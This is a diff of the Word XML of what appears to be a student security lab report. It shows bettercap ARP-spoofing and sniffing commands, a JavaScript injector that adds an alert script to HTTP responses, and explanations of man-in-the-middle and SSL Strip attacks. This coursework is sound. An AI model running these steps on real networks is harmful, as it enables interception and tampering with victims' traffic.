+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>arp</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5487,7 +5932,57 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>spoof arp spoofer started</w:t>
+        <w:t>spoof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>arp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>spoofer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> started</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5642,6 +6137,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -5687,6 +6183,7 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -5777,6 +6274,7 @@
         </w:rPr>
         <w:t>[</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -5804,6 +6302,7 @@
         </w:rPr>
         <w:t>new</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -6164,6 +6663,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -6209,6 +6709,7 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6387,7 +6888,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>0.16</w:t>
+        <w:t>0.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>16</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6407,6 +6918,7 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -6432,7 +6944,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> net</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>net</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6468,7 +6990,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">verbose </w:t>
+        <w:t>verbose</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6613,7 +7145,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>0.16</w:t>
+        <w:t>0.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="006666"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>16</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6633,14 +7175,25 @@
         </w:rPr>
         <w:t>»</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> net</w:t>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>net</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6658,7 +7211,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>sniff on</w:t>
+        <w:t>sniff</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6769,7 +7332,43 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t> is commented out. Replace the commented-out line so that the injected javascript displays a popup (alert) that says “Successful Injection”. Report the complete injector.js you used.</w:t>
+        <w:t xml:space="preserve"> is commented out. Replace the commented-out line so that the injected </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>javascript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> displays a popup (alert) that </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>says</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> “Successful Injection”. Report the complete injector.js you used.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6858,16 +7457,38 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> onLoad</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>()</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>onLoad</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6931,6 +7552,15 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
         <w:t>log</w:t>
       </w:r>
       <w:r>
@@ -6958,7 +7588,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>"Injector loaded."</w:t>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="008800"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>Injector loaded."</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7022,6 +7662,15 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
         <w:t>log</w:t>
       </w:r>
       <w:r>
@@ -7033,6 +7682,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7085,7 +7735,27 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>'arp.spoof.targets'</w:t>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="008800"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>arp.spoof.targets</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="008800"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>'</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7238,8 +7908,20 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> onResponse</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>onResponse</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7249,6 +7931,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7348,6 +8031,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7373,8 +8057,19 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> res</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>res</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7411,6 +8106,7 @@
         </w:rPr>
         <w:t>indexOf</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7580,7 +8276,18 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> res</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>res</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7600,6 +8307,8 @@
         </w:rPr>
         <w:t>ReadBody</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7663,6 +8372,7 @@
         </w:rPr>
         <w:tab/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7688,8 +8398,19 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> body</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>body</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7708,6 +8429,7 @@
         </w:rPr>
         <w:t>indexOf</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7869,6 +8591,16 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
         <w:t>res</w:t>
       </w:r>
       <w:r>
@@ -7889,6 +8621,8 @@
         </w:rPr>
         <w:t>Body</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -7914,7 +8648,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> body</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>body</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7934,6 +8678,7 @@
         </w:rPr>
         <w:t>replace</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -8076,7 +8821,27 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>'&lt;script&gt;alert("Successful Injection");&lt;/script&gt;&lt;/head&gt;'</w:t>
+        <w:t>'&lt;script&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="008800"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>alert(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="008800"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"Successful Injection");&lt;/script&gt;&lt;/head&gt;'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8364,7 +9129,25 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t> website (e.g </w:t>
+        <w:t> website (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>e.g</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t> </w:t>
       </w:r>
       <w:hyperlink r:id="rId19" w:history="1">
         <w:r>
@@ -8524,7 +9307,63 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:tab/>
-        <w:t>The reason HTTPS websites do not work with the bettercap http.proxy module is because of the protocol that the http.proxy module is using. The module is designed to work on websites using the HTTP protocol not HTTPS. As mentioned in class, HTTPS is identical to HTTP syntactically. However, HTTPS adds a</w:t>
+        <w:t xml:space="preserve">The reason HTTPS websites do not work with the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>bettercap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>http.proxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> module is because of the protocol that the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>http.proxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> module is using. The module is designed to work on websites using the HTTP protocol not HTTPS. As mentioned in class, HTTPS is identical to HTTP syntactically. However, HTTPS adds a</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8540,7 +9379,27 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> layer know as SSL, or a newer implantation known as TLS. Theoretically, if we wanted the http.proxy module to work, what we could do is set up an SSL Strip attack. Which would downgrade websites using the HTTPS protocol down to the HTTP protocol</w:t>
+        <w:t xml:space="preserve"> layer know as SSL, or a newer implantation known as TLS. Theoretically, if we wanted the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>http.proxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> module to work, what we could do is set up an SSL Strip attack. Which would downgrade websites using the HTTPS protocol down to the HTTP protocol</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8556,7 +9415,27 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> that the http.proxy module would work</w:t>
+        <w:t xml:space="preserve"> that the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>http.proxy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> module would work</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8608,7 +9487,25 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>How does the HTTP Javascript injection work in this case in terms of file/packet inspection? Explain in a few sentences.</w:t>
+        <w:t xml:space="preserve">How does the HTTP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Javascript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> injection work in this case in terms of file/packet inspection? Explain in a few sentences.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8659,7 +9556,81 @@
           <w:color w:val="000000"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">computer instead of the source. Once we had done that, we performed a man in the middle attack (MitM) which gives us full control over the user by inspecting traffic between the victim and target. Moreover, the MitM attack allows us to modify the traffic being sent to the victim. This is where the bettercap http.proxy module comes in play. </w:t>
+        <w:t>computer instead of the source. Once we had done that, we performed a man in the middle attack (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>MitM</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) which gives us full control over the user by inspecting traffic between the victim and target. Moreover, the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>MitM</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+          <w:color w:val="000000"/>
